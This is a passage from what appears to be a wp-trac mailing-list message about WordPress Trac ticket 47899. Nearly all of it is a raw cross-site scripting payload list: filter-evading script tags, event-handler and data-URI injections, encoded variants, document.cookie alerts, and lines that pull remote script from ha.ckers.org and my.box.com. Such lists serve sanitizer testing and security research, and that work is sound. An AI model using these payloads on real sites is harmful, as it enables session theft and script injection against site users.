 DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
 <SCRIPT>document.write("<SCRI");</SCRIPT>PT
 SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 <form id="test" /><button form="test"
 formaction="javascript:alert(123)">TESTHTML5FORMACTION
 <form><button formaction="javascript:alert(123)">crosssitespt
 <frameset onload=alert(123)>
 <!--<img src="--><img src=x onerror=alert(123)//">
 <style><img src="</style><img src=x onerror=alert(123)//">
 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
 <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
 <embed src="javascript:alert(1)">
 <? foo="><script>alert(1)</script>">
 <! foo="><script>alert(1)</script>">
 </ foo="><script>alert(1)</script>">
 <script>({0:#0=alert/#0#/#0#(123)})</script>
 <script>ReferenceError.prototype.__defineGetter__('name',
 function(){alert(123)}),x</script>
 <script>Object.__noSuchMethod__ =
 Function,[{}][0].constructor._('alert(1)')()</script>
 <script src="#">{alert(1)}</script>;1
 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null
 ,'rsa-dual-use')</script>
 <svg xmlns="#"><script>alert(1)</script></svg>
 <svg onload="javascript:alert(123)" xmlns="#"></svg>
 <iframe xmlns="#" src="javascript:alert(1)"></iframe>
 +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
 %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
 +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
 %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
 %253cscript%253ealert(document.cookie)%253c/script%253e
 �><s�%2b�cript>alert(document.cookie)</script>
 �><ScRiPt>alert(document.cookie)</script>
 �><<script>alert(document.cookie);//<</script>
 foo<script>alert(document.cookie)</script>
 <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
 %22/%3E%3CBODY%20onload=�document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)�%3E
 �; alert(document.cookie); var foo=�
 foo\�; alert(document.cookie);//�;
 </script><script >alert(document.cookie)</script>
 <img src=asdf onerror=alert(document.cookie)>
 <BODY ONLOAD=alert(�XSS�)>
 <script>alert(1)</script>
 "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99,
 101))</script>
 <video src=1 onerror=alert(1)>
 <audio src=1 onerror=alert(1)>

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47899#comment:2>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform


More information about the wp-trac mailing list